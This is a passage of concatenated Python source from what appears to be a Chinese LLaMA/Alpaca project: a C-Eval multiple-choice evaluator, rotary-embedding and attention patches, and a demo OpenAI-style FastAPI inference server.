LlamaTokenizer.from_pretrained(model_path) self.model = LlamaForCausalLM.from_pretrained( model_path, load_in_8bit=False, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto') self.generation_config = dict( temperature=temperature, top_k=40, top_p=0.9, do_sample=True, num_beams=1, repetition_penalty=1.1, max_new_tokens=20 ) self.sA_id = self.tokenizer.encode("A", add_special_tokens=False)[0] self.sB_id = self.tokenizer.encode("B", add_special_tokens=False)[0] self.sC_id = self.tokenizer.encode("C", add_special_tokens=False)[0] self.sD_id = self.tokenizer.encode("D", add_special_tokens=False)[0] self.A_id = self.tokenizer.encode(":A")[-1] self.B_id = self.tokenizer.encode(":B")[-1] self.C_id = self.tokenizer.encode(":C")[-1] self.D_id = self.tokenizer.encode(":D")[-1] def eval_subject(self, subject_name, test_df, dev_df=None, few_shot=False, cot=False, save_result_dir=None, with_prompt=False, constrained_decoding=False, do_test=False): all_answers = {} if constrained_decoding is True: self.generation_config['output_scores'] = True self.generation_config['return_dict_in_generate'] = True self.generation_config['max_new_tokens'] = 1 self.generation_config['top_p'] = 1.0 self.generation_config['top_k'] = 0 correct_num = 0 if save_result_dir: result = [] score = [] if few_shot: history = self.generate_few_shot_prompt(subject_name, dev_df, cot=cot) else: history = '' answers = ['NA'] * len(test_df) if do_test is True else list(test_df['answer']) for row_index, row in tqdm(test_df.iterrows(), total=len(test_df)): question = self.format_example(row, include_answer=False, cot=cot,with_prompt=with_prompt) instruction = history + question if with_prompt: prompt_template = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{instruction}\n\n### Response: ") instruction = prompt_template.format_map({'instruction': instruction,'subject':subject_name}) inputs = self.tokenizer(instruction, return_tensors="pt") generation_output = self.model.generate( input_ids = inputs["input_ids"].to(self.device), attention_mask = inputs['attention_mask'].to(self.device), eos_token_id=self.tokenizer.eos_token_id, pad_token_id=self.tokenizer.pad_token_id, **self.generation_config ) batch_size, length = inputs.input_ids.shape if constrained_decoding is True: logits = generation_output.scores[0][0] logits = logits.float().cpu().detach() choices1_logits = logits[[self.sA_id,self.sB_id,self.sC_id,self.sD_id]] choices2_logits = logits[[self.A_id,self.B_id,self.C_id,self.D_id]] choicesAll_logits = (choices1_logits + choices2_logits).numpy() assert not (np.any(np.isinf(choicesAll_logits)) or np.any(np.isnan(choicesAll_logits))) ans = {0: "A", 1: "B", 2: "C", 3: "D"}[np.argmax(choicesAll_logits)] response = self.tokenizer.decode([logits.argmax(-1).item()]) else: response = self.tokenizer.decode(generation_output[0, length:], skip_special_tokens=True) ans, direct_extract = self.extract_answer(row, response) if ans == answers[row_index]: correct_num += 1 correct = 1 else: correct = 0 print(f"\n=======begin {str(row_index)}=======") print("question: ", question) print("response: ", response) print("ans: ", ans) print("ground truth: ", answers[row_index], "\n") if save_result_dir: result.append(response) score.append(correct) print(f"=======end {str(row_index)}=======") all_answers[str(row_index)] = ans correct_ratio = 100*correct_num/len(answers) if save_result_dir: test_df['model_output'] = result test_df['correctness'] = score test_df.to_csv(os.path.join(save_result_dir, f'{subject_name}_test.csv')) return correct_ratio, all_answers def format_example(self, line, include_answer=True, cot=False, with_prompt=False): example = line['question'] for choice in self.choices: example += f'\n{choice}. {line[f"{choice}"]}' if include_answer: if cot: example += "\n答案:让我们一步一步思考,\n" + \ line["explanation"] + f"\n所以答案是{line['answer']}。\n\n" else: example += '\n答案:' + line["answer"] + '\n\n' else: if with_prompt is False: if cot: example += "\n答案:让我们一步一步思考,\n1." else: example += '\n答案:' else: if cot: example += "\n答案是什么?让我们一步一步思考,\n1." else: example += '\n答案是什么? ' return example def generate_few_shot_prompt(self, subject, dev_df, cot=False): prompt = f"以下是中国关于{subject}考试的单项选择题,请选出其中的正确答案。\n\n" k = self.k if self.k == -1: k = dev_df.shape[0] for i in range(k): prompt += self.format_example( dev_df.iloc[i, :], include_answer=True, cot=cot ) return prompt def extract_answer(self, line, gen_ans): m = re.findall(r'所以答案是(.+?)。', gen_ans, re.M) if len(m) > 0 and m[-1] in self.choices: return m[-1], True answer_patterns = [ r'([ABCD])是正确的', r'选项([ABCD])正确', r'答案为([ABCD])', r'答案是([ABCD])', r'答案([ABCD])', r'选择([ABCD])', r'答案:([ABCD])', r'选择答案([ABCD])' ] # RE extraction for answer_pattern in answer_patterns: m = re.search(answer_pattern, gen_ans, re.M) if m: answer = m.group(1) return answer, False # only containing one choice-character m = re.findall(r'[ABCD]', gen_ans, re.M) if len(m) >= 1: answer = m[0] return answer, False # only containing one choice-context choices_dict = {} pattern = "" for c in self.choices: choices_dict[str(line[f'{c}'])] = c pattern += re.escape(str(line[f'{c}']))+"|" pattern = pattern[:-1] m = re.findall(pattern, gen_ans, re.M) print("w/ escape:",repr(pattern),gen_ans,(len(m)>=1)) if len(m) >= 1: answer = choices_dict[m[0]] return answer, False return random.choice('ABCD'), False File: scripts/ceval/eval.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import os import argparse import pandas as pd import torch import json from llama_evaluator import Llama_Evaluator import time choices = ["A", "B", "C", "D"] def main(args, evaluator,take): assert os.path.exists("subject_mapping.json"), "subject_mapping.json not found!" with open("subject_mapping.json") as f: subject_mapping = json.load(f) filenames = os.listdir("data/val") subject_list = [val_file.replace("_val.csv","") for val_file in filenames] accuracy, summary = {}, {} run_date=time.strftime('%Y-%m-%d_%H-%M-%S',time.localtime(time.time())) output_dir = args.output_dir save_result_dir=os.path.join(output_dir,f"take{take}") if not os.path.exists(save_result_dir): os.makedirs(save_result_dir,exist_ok=True) all_answers = {} for index,subject_name in enumerate(subject_list): print(f"{index/len(subject_list)} Inference starts at {run_date} on {args.model_path} with subject of {subject_name}!") val_file_path=os.path.join('data/val',f'{subject_name}_val.csv') dev_file_path=os.path.join('data/dev',f'{subject_name}_dev.csv') test_file_path=os.path.join('data/test',f'{subject_name}_test.csv') val_df=pd.read_csv(val_file_path) if args.do_test is False else pd.read_csv(test_file_path) dev_df=pd.read_csv(dev_file_path) if args.few_shot else None correct_ratio, answers = evaluator.eval_subject(subject_name, val_df, dev_df, save_result_dir=save_result_dir if args.do_save_csv else None, few_shot=args.few_shot, cot=args.cot, with_prompt=args.with_prompt, constrained_decoding=args.constrained_decoding, do_test=args.do_test) print(f"Subject: {subject_name}") print(f"Acc: {correct_ratio}") accuracy[subject_name] = correct_ratio summary[subject_name] = {"score":correct_ratio, "num":len(val_df), "correct":correct_ratio*len(val_df)/100} all_answers[subject_name] = answers json.dump(all_answers,open(save_result_dir+'/submission.json','w'),ensure_ascii=False,indent=4) print("Accuracy:") for k, v in accuracy.items(): print(k, ": ", v) total_num = 0 total_correct = 0 summary['grouped'] = { "STEM": {"correct": 0.0, "num": 0}, "Social Science": {"correct": 0.0, "num": 0}, "Humanities": {"correct": 0.0, "num": 0}, "Other": {"correct": 0.0, "num": 0} } for subj, info in subject_mapping.items(): group = info[2] summary['grouped'][group]["num"] += summary[subj]['num'] summary['grouped'][group]["correct"] += summary[subj]['correct'] for group, info in summary['grouped'].items(): info['score'] = info["correct"] / info["num"] total_num += info["num"] total_correct += info["correct"] summary['All'] = {"score": total_correct / total_num, "num": total_num, "correct": total_correct} json.dump(summary,open(save_result_dir+'/summary.json','w'),ensure_ascii=False,indent=2) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--model_path", type=str) parser.add_argument("--cot",choices=["False","True"], default="False") parser.add_argument("--few_shot", choices=["False","True"], default="True") parser.add_argument("--ntrain", "-k", type=int, default=5) parser.add_argument("--with_prompt", choices=["False","True"], default="False") parser.add_argument("--constrained_decoding", choices=["False","True"], default="True") parser.add_argument("--temperature",type=float,default=0.2) parser.add_argument("--n_times", default=1,type=int) parser.add_argument("--do_save_csv", choices=["False","True"], default="False") parser.add_argument("--output_dir", type=str) parser.add_argument("--do_test", choices=["False","True"], default="False") args = parser.parse_args() args.cot = args.cot == "True" args.few_shot = args.few_shot == "True" args.with_prompt = args.with_prompt == "True" args.constrained_decoding = args.constrained_decoding == "True" args.do_test = args.do_test == "True" args.do_save_csv = args.do_save_csv == "True" if args.constrained_decoding is True: args.n_times=max(args.n_times,1) print(args) device = torch.device(0) print(device) evaluator=Llama_Evaluator( choices=choices, k=args.ntrain, model_path=args.model_path, device=device, temperature = args.temperature ) for i in range(args.n_times): main(args,evaluator=evaluator,take=i) File: scripts/ceval/evaluator.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import string class Evaluator: def __init__(self, choices, model_name, k=-1): self.choices = choices self.model_name = model_name self.k = k self.puncs = list(string.punctuation) def format_example(self, line, include_answer=True): example = line['question'] for choice in self.choices: example += f'\n{choice}. {line[f"{choice}"]}' example += '\n答案:' if include_answer: example += f'{line["answer"]}\n\n' return example def generate_few_shot_prompt(self, subject, dev_df): prompt = f"以下是中国关于{subject}考试的单项选择题,请选出其中的正确答案。\n\n" k = self.k if self.k == -1: k = dev_df.shape[0] for i in range(k): prompt += self.format_example(dev_df.iloc[i, :]) return prompt def eval_subject(self, subject_name, test_df, dev_df=None, few_shot=False, save_result_dir=None): pass def normalize_answer(self,s): def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude=set(self.puncs) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_punc(lower(s))) def exact_match(self,pred, target): return self.normalize_answer(pred)==self.normalize_answer(target) File: scripts/openai_server_demo/patches.py import torch from torch import nn from typing import Optional, Tuple, Union import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb, rotate_half import math try: from xformers import ops as xops except ImportError: xops = None print( "Xformers is not installed correctly. If you want to use memory_efficient_attention use the following command to install Xformers\npip install xformers." ) STORE_KV_BEFORE_ROPE = False USE_MEM_EFF_ATTENTION = False ALPHA = 1.0 def apply_rotary_pos_emb_single(q, cos, sin, position_ids): # The first two dimensions of cos and sin are always 1, so we can `squeeze` them. cos = cos.squeeze(1).squeeze(0) # [seq_len, dim] sin = sin.squeeze(1).squeeze(0) # [seq_len, dim] cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] q_embed = (q * cos) + (rotate_half(q) * sin) return q_embed def xformers_forward( self, hidden_states: torch.Tensor, attention_mask: Optional[torch.Tensor] = None, position_ids: Optional[torch.LongTensor] = None, past_key_value: Optional[Tuple[torch.Tensor]] = None, output_attentions: bool = False, use_cache: bool = False, ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: bsz, q_len, _ = hidden_states.size() query_states = self.q_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) key_states = self.k_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) value_states = self.v_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) kv_seq_len = key_states.shape[-2] if past_key_value is not None: kv_seq_len += past_key_value[0].shape[-2] if STORE_KV_BEFORE_ROPE is False: cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states, key_states = apply_rotary_pos_emb(query_states, key_states, cos, sin, position_ids) # [bsz, nh, t, hd] if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None else: if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states = apply_rotary_pos_emb_single(query_states, cos, sin, position_ids) position_ids = torch.arange(kv_seq_len, dtype=torch.long, device=cos.device) position_ids = position_ids.unsqueeze(0).view(-1, kv_seq_len) key_states = apply_rotary_pos_emb_single(key_states, cos, sin, position_ids) if xops is not None and USE_MEM_EFF_ATTENTION: attn_weights = None query_states = query_states.transpose(1, 2) key_states = key_states.transpose(1, 2) value_states = value_states.transpose(1, 2) attn_bias = None if (query_states.size(1)==1 and key_states.size(1)>1) else xops.LowerTriangularMask() attn_output = xops.memory_efficient_attention( query_states, key_states, value_states, attn_bias=attn_bias, p=0) else: attn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim) if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len): raise ValueError( f"Attention weights should be of size {(bsz * self.num_heads, q_len, kv_seq_len)}, but is" f" {attn_weights.size()}" ) if attention_mask is not None: if attention_mask.size() != (bsz, 1, q_len, kv_seq_len): raise ValueError( f"Attention mask should be of size {(bsz, 1, q_len, kv_seq_len)}, but is {attention_mask.size()}" ) attn_weights = attn_weights + attention_mask attn_weights = torch.max( attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min, device=attn_weights.device) ) # upcast attention to fp32 attn_weights = nn.functional.softmax(attn_weights, dim=-1, dtype=torch.float32).to(query_states.dtype) attn_output = torch.matmul(attn_weights, value_states) if attn_output.size() != (bsz, self.num_heads, q_len, self.head_dim): raise ValueError( f"`attn_output` should be of size {(bsz, self.num_heads, q_len, self.head_dim)}, but is" f" {attn_output.size()}" ) attn_output = attn_output.transpose(1, 2) attn_output = attn_output.reshape(bsz, q_len, self.hidden_size) attn_output = self.o_proj(attn_output) if not output_attentions: attn_weights = None return attn_output, attn_weights, past_key_value old_init = transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ def adaptive_ntk_init(self, dim, max_position_embeddings=2048, base=10000, device=None): self.dim = dim self.alpha = ALPHA if isinstance(ALPHA,(float,int)): base = base * ALPHA ** (dim / (dim-2)) self.base = base elif ALPHA=='auto': self.base = base else: raise ValueError(ALPHA) old_init(self, dim, max_position_embeddings, base, device) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(device) / dim)) self.register_buffer("ntk_inv_freq", ntk_inv_freq, persistent=False) def adaptive_ntk_forward(self, x, seq_len=None): if seq_len > self.max_seq_len_cached: if isinstance(self.alpha,(float,int)): self.max_seq_len_cached = seq_len t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) freqs = torch.einsum("i,j->ij", t, self.ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) self.register_buffer("cos_cached", emb.cos()[None, None, :, :], persistent=False) self.register_buffer("sin_cached", emb.sin()[None, None, :, :], persistent=False) return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype), ) elif self.alpha=='auto': t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) dim = self.dim alpha = (seq_len / 1024 - 1) * 1.1 base = self.base * alpha ** (dim / (dim-2)) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(x.device) / dim )) freqs = torch.einsum("i,j->ij", t, ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) cos_cached = emb.cos()[None, None, :, :] sin_cached = emb.sin()[None, None, :, :] return ( cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) else: return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) def apply_attention_patch( use_memory_efficient_attention=False, store_kv_before_rope=False ): global USE_MEM_EFF_ATTENTION, STORE_KV_BEFORE_ROPE if use_memory_efficient_attention is True and xops is not None: USE_MEM_EFF_ATTENTION = use_memory_efficient_attention print("USE_MEM_EFF_ATTENTION: ",USE_MEM_EFF_ATTENTION) STORE_KV_BEFORE_ROPE = store_kv_before_rope print("STORE_KV_BEFORE_ROPE:", STORE_KV_BEFORE_ROPE) transformers.models.llama.modeling_llama.LlamaAttention.forward = xformers_forward def apply_ntk_scaling_patch(alpha: Union[float,str]): global ALPHA ALPHA = alpha try: ALPHA = float(ALPHA) except ValueError: if ALPHA!="auto": raise ValueError(f"Alpha can only be a float or 'auto', but given {ALPHA}") print(f"Apply NTK scaling with ALPHA={ALPHA}") transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ = adaptive_ntk_init transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.forward = adaptive_ntk_forward File: scripts/openai_server_demo/openai_api_protocol.py from typing import Optional, List, Dict, Any, Union import time import shortuuid from pydantic import BaseModel, Field class ChatCompletionRequest(BaseModel): model: str = "chinese-llama-alpaca" messages: Union[str, List[Dict[str, str]]] temperature: Optional[float] = 0.7 top_p: Optional[float] = 1.0 top_k: Optional[int] = 40 n: Optional[int] = 1 max_tokens: Optional[int] = 128 num_beams: Optional[int] = 1 stop: Optional[Union[str, List[str]]] = None stream: Optional[bool] = False repetition_penalty: Optional[float] = 1.0 user: Optional[str] = None do_sample: Optional[bool] = True class ChatMessage(BaseModel): role: str content: str class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage class ChatCompletionResponse(BaseModel): id: str = Field(default_factory=lambda: f"chatcmpl-{shortuuid.random()}") object: str = "chat.completion" created: int = Field(default_factory=lambda: int(time.time())) model: str = "chinese-llama-alpaca" choices: List[ChatCompletionResponseChoice] class EmbeddingsRequest(BaseModel): input: Union[str, List[Any]] user: Optional[str] = None class EmbeddingsResponse(BaseModel): object: str = "list" data: List[Dict[str, Any]] model: str = "chinese-llama-alpaca" class CompletionRequest(BaseModel): prompt: Union[str, List[Any]] temperature: Optional[float] = 0.1 n: Optional[int] = 1 max_tokens: Optional[int] = 128 stop: Optional[Union[str, List[str]]] = None stream: Optional[bool] = False top_p: Optional[float] = 0.75 top_k: Optional[int] = 40 num_beams: Optional[int] = 1 logprobs: Optional[int] = None echo: Optional[bool] = False repetition_penalty: Optional[float] = 1.0 user: Optional[str] = None do_sample: Optional[bool] = True class CompletionResponseChoice(BaseModel): index: int text: str class CompletionResponse(BaseModel): id: Optional[str] = Field(default_factory=lambda: f"cmpl-{shortuuid.random()}") object: Optional[str] = "text_completion" created: Optional[int] = Field(default_factory=lambda: int(time.time())) model: Optional[str] = 'chinese-llama-alpaca' choices: List[CompletionResponseChoice] File: scripts/openai_server_demo/openai_api_server.py import argparse import os from fastapi import FastAPI import uvicorn parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, type=str, required=True) parser.add_argument('--lora_model', default=None, type=str,help="If None, perform inference on the base model") parser.add_argument('--tokenizer_path',default=None,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--load_in_8bit',action='store_true', help='use 8 bit model') parser.add_argument('--only_cpu',action='store_true',help='only use CPU for inference') parser.add_argument('--alpha',type=str,default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. ") args = parser.parse_args() load_in_8bit = args.load_in_8bit if args.only_cpu is True: args.gpus = "" os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus import torch import torch.nn.functional as F from transformers import LlamaForCausalLM, LlamaTokenizer, GenerationConfig from peft import PeftModel from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) from openai_api_protocol import ( ChatCompletionRequest, ChatCompletionResponse, ChatMessage, ChatCompletionResponseChoice, CompletionRequest, CompletionResponse, CompletionResponseChoice, EmbeddingsRequest, EmbeddingsResponse, ) load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto' if not args.only_cpu else None, ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size!=tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained(base_model, args.lora_model,torch_dtype=load_type,device_map='auto',) else: model = base_model if device==torch.device('cpu'): model.float() model.eval() def generate_completion_prompt(instruction: str): """Generate prompt for completion""" return f"""Below is an instruction that describes a task. Write a response that appropriately completes the request. ### Instruction: {instruction} ### Response: """ def generate_chat_prompt(messages: list): """Generate prompt for chat completion""" system_msg = '''Below is an instruction that describes a task. Write a response that appropriately completes the request.''' for msg in messages: if msg.role == 'system': system_msg = msg.content prompt = f"{system_msg}\n\n" for msg in messages: if msg.role == 'system': continue if msg.role == 'assistant': prompt += f"### Response: {msg.content}\n\n" if msg.role == 'user': prompt += f"### Instruction:\n{msg.content}\n\n" prompt += "### Response: " return prompt def predict( input, max_new_tokens=128, top_p=0.75, temperature=0.1, top_k=40, num_beams=4, repetition_penalty=1.0, do_sample=True, **kwargs, ): """ Main inference method type(input) == str -> /v1/completions type(input) == list -> /v1/chat/completions """ if isinstance(input, str): prompt = generate_completion_prompt(input) else: prompt = generate_chat_prompt(input) inputs = tokenizer(prompt, return_tensors="pt") input_ids = inputs["input_ids"].to(device) generation_config = GenerationConfig( temperature=temperature, top_p=top_p, top_k=top_k, num_beams=num_beams, do_sample=do_sample, **kwargs, ) with torch.no_grad(): generation_output = model.generate( input_ids=input_ids, generation_config=generation_config, return_dict_in_generate=True, output_scores=False, max_new_tokens=max_new_tokens, repetition_penalty=float(repetition_penalty), ) s = generation_output.sequences[0] output = tokenizer.decode(s, skip_special_tokens=True) output = output.split("### Response:")[-1].strip() return output def get_embedding(input): """Get embedding main function""" with torch.no_grad(): if tokenizer.pad_token == None: tokenizer.add_special_tokens({'pad_token': '[PAD]'}) encoding = tokenizer( input, padding=True, return_tensors="pt" ) input_ids = encoding["input_ids"].to(device) attention_mask = encoding["attention_mask"].to(device) model_output = model( input_ids, attention_mask, output_hidden_states=True ) data = model_output.hidden_states[-1] mask = attention_mask.unsqueeze(-1).expand(data.size()).float() masked_embeddings = data * mask sum_embeddings = torch.sum(masked_embeddings, dim=1) seq_length = torch.sum(mask, dim=1) embedding = sum_embeddings / seq_length normalized_embeddings = F.normalize(embedding, p=2, dim=1) ret = normalized_embeddings.squeeze(0).tolist() return ret app = FastAPI() @app.post("/v1/chat/completions") async def create_chat_completion(request: ChatCompletionRequest): """Creates a completion for the chat message""" msgs = request.messages if isinstance(msgs, str): msgs = [ChatMessage(role='user',content=msgs)] else: msgs = [ChatMessage(role=x['role'],content=x['message']) for x in msgs] output = predict( input=msgs, max_new_tokens=request.max_tokens, top_p=request.top_p, top_k=request.top_k, temperature=request.temperature, num_beams=request.num_beams, repetition_penalty=request.repetition_penalty, do_sample=request.do_sample, ) choices = [ChatCompletionResponseChoice(index = i, message = msg) for i, msg in enumerate(msgs)] choices += [ChatCompletionResponseChoice(index = len(choices), message = ChatMessage(role='assistant',content=output))] return ChatCompletionResponse(choices = choices) @app.post("/v1/completions") async def create_completion(request: CompletionRequest): """Creates a completion""" output = predict( input=request.prompt, max_new_tokens=request.max_tokens, top_p=request.top_p, top_k=request.top_k, temperature=request.temperature, num_beams=request.num_beams, repetition_penalty=request.repetition_penalty, do_sample=request.do_sample, ) choices = [CompletionResponseChoice(index = 0, text = output)] return CompletionResponse(choices = choices) @app.post("/v1/embeddings") async def create_embeddings(request: EmbeddingsRequest): """Creates text embedding""" embedding = get_embedding(request.input) data = [{ "object": "embedding", "embedding": embedding, "index": 0 }] return EmbeddingsResponse(data=data) if __name__ == "__main__": log_config = uvicorn.config.LOGGING_CONFIG log_config["formatters"]["access"]["fmt"] = "%(asctime)s - %(levelname)s - %(message)s" log_config["formatters"]["default"]["fmt"] = "%(asctime)s - %(levelname)s - %(message)s" uvicorn.run(app, host='0.0.0.0', port=19327, workers=1, log_config=log_config) File: scripts/inference/patches.py import torch from torch import nn from typing import Optional, Tuple, Union import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb, rotate_half import math try: from xformers import ops as xops except ImportError: xops = None print( "Xformers is not installed correctly. If you want to use memory_efficient_attention use the following command to install Xformers\npip install xformers." ) STORE_KV_BEFORE_ROPE = False USE_MEM_EFF_ATTENTION = False ALPHA = 1.0 def apply_rotary_pos_emb_single(q, cos, sin, position_ids): # The first two dimensions of cos and sin are always 1, so we can `squeeze` them. cos = cos.squeeze(1).squeeze(0) # [seq_len, dim] sin = sin.squeeze(1).squeeze(0) # [seq_len, dim] cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] q_embed = (q * cos) + (rotate_half(q) * sin) return q_embed def xformers_forward( self, hidden_states: torch.Tensor, attention_mask: Optional[torch.Tensor] = None, position_ids: Optional[torch.LongTensor] = None, past_key_value: Optional[Tuple[torch.Tensor]] = None, output_attentions: bool = False, use_cache: bool = False, ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: bsz, q_len, _ = hidden_states.size() query_states = self.q_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) key_states = self.k_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) value_states = self.v_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) kv_seq_len = key_states.shape[-2] if past_key_value is not None: kv_seq_len += past_key_value[0].shape[-2] if STORE_KV_BEFORE_ROPE is False: cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states, key_states = apply_rotary_pos_emb(query_states, key_states, cos, sin, position_ids) # [bsz, nh, t, hd] if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None else: if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states = apply_rotary_pos_emb_single(query_states, cos, sin, position_ids) position_ids = torch.arange(kv_seq_len, dtype=torch.long, device=cos.device) position_ids = position_ids.unsqueeze(0).view(-1, kv_seq_len) key_states = apply_rotary_pos_emb_single(key_states, cos, sin, position_ids) if xops is not None and USE_MEM_EFF_ATTENTION: attn_weights = None query_states = query_states.transpose(1, 2) key_states = key_states.transpose(1, 2) value_states = value_states.transpose(1, 2) attn_bias = None if (query_states.size(1)==1 and key_states.size(1)>1) else xops.LowerTriangularMask() attn_output = xops.memory_efficient_attention( query_states, key_states, value_states, attn_bias=attn_bias, p=0) else: attn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim) if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len): raise ValueError( f"Attention weights should be of size {(bsz * self.num_heads, q_len, kv_seq_len)}, but is" f" {attn_weights.size()}" ) if attention_mask is not None: if attention_mask.size() != (bsz, 1, q_len, kv_seq_len): raise ValueError( f"Attention mask should be of size {(bsz, 1, q_len, kv_seq_len)}, but is {attention_mask.size()}" ) attn_weights = attn_weights + attention_mask attn_weights = torch.max( attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min, device=attn_weights.device) ) # upcast attention to fp32 attn_weights = nn.functional.softmax(attn_weights, dim=-1, dtype=torch.float32).to(query_states.dtype) attn_output = torch.matmul(attn_weights, value_states) if attn_output.size() != (bsz, self.num_heads, q_len, self.head_dim): raise ValueError( f"`attn_output` should be of size {(bsz, self.num_heads, q_len, self.head_dim)}, but is" f" {attn_output.size()}" ) attn_output = attn_output.transpose(1, 2) attn_output = attn_output.reshape(bsz, q_len, self.hidden_size) attn_output = self.o_proj(attn_output) if not output_attentions: attn_weights = None return attn_output, attn_weights, past_key_value old_init = transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ def adaptive_ntk_init(self, dim, max_position_embeddings=2048, base=10000, device=None): self.dim = dim self.alpha = ALPHA if isinstance(ALPHA,(float,int)): base = base * ALPHA ** (dim / (dim-2)) self.base = base elif ALPHA=='auto': self.base = base else: raise ValueError(ALPHA) old_init(self, dim, max_position_embeddings, base, device) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(device) / dim)) self.register_buffer("ntk_inv_freq", ntk_inv_freq, persistent=False) def adaptive_ntk_forward(self, x, seq_len=None): if seq_len > self.max_seq_len_cached: if isinstance(self.alpha,(float,int)): self.max_seq_len_cached = seq_len t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) freqs = torch.einsum("i,j->ij", t, self.ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) self.register_buffer("cos_cached", emb.cos()[None, None, :, :], persistent=False) self.register_buffer("sin_cached", emb.sin()[None, None, :, :], persistent=False) return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype), ) elif self.alpha=='auto': t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) dim = self.dim alpha = (seq_len / 1024 - 1) * 1.1 base = self.base * alpha ** (dim / (dim-2)) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(x.device) / dim )) freqs = torch.einsum("i,j->ij", t, ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) cos_cached = emb.cos()[None, None, :, :] sin_cached = emb.sin()[None, None, :, :] return ( cos_cached[:, :, :seq_len, 